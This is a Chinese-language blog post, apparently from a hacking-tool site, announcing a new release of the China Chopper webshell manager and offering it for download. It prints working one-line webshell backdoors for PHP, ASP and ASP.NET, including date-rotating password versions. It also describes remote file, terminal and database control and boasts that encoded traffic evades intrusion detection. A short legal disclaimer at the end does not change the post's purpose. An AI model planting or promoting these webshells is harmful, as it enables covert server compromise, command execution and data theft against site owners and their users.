前面有为大家分享中国菜刀,可是是2011的版本的很老也很久没更新了
最近一段时间作者更新出了菜刀@20141213 版个人感觉没多大的必要 表面看来只是做了一个DIY的皮肤
上图可以看出2011版本的中国菜刀与新出来的菜刀功能并无多大差异只是多了一个皮肤
且新版的中国菜刀还加入的官方网站的网址弹出,大家可以下载下来看下如果不喜欢的删除即可。
老版本的中国菜刀个人感觉非常经典:
———————————————————————————————————-
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分
1)基本信息
Eval服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP, ASP, ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下:
| 1 2 3 | PHP: <?php @eval($_POST['123']);?> ASP: <%eval request("123")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["123"],"unsafe");%> |
(注意: ASP.NET要单独一个文件或此文件也是Jscript脚本)
Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
此模式可按需定制,比如只要浏览目录,或是只要虚拟终端功能,代码可以很简短。
随日期变化的连接密码, 服务端写法:
Asp.NET:
| 1 | <%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%> |
PHP:
| 1 | @eval($_POST[strtoupper(md5(gmdate("Ymd")."37E4DD20C310142564FC483DB1132F36"))]); |
例如:菜刀的密码为123,在前面加三个字符,新密码为:{D}123
2)几大功能
- 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,
- 保存后即可使用文件管理,虚拟终端,数据库管理,自写脚本几大块功能。
- 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
- 虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法), 超长命令会分割为5k字节一份,分别提交。
- 数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS, 以及支持ADO方式连接的数据库。
- 如果精通SQL语法,何必还要PHPMYADMIN呢?而且,菜刀还支持任何脚本的数据库管理呢。
- (各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
- 自写脚本:通过简单编码后提交用户自己的脚本到服务端执行,实现丰富的功能,也可选择发送到浏览器执行。
- 如果要写自己的CCC脚本,可以参考一下CCC目录下的示例代码, 相信你也可以写出功能丰富的脚本。
- 可以在官网下载别人的CCC脚本,或分享你的得意之作。
- 注意:由于服务器的安全设置,某些功能可能不能正常使用。
下载地址:
解压密码:www.exehack.net
提取密码:jeql
———————————————————————————————————-
免责申明:
请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果本厂家不承担任何责任!
- 版权声明:本站原创文章,于10个月前,由shentou发表,共 2108字。
- 转载请注明:webshell管理器-中国菜刀2014新版发布 | 安全渗透军火库|SHENTOU.ORG +复制链接
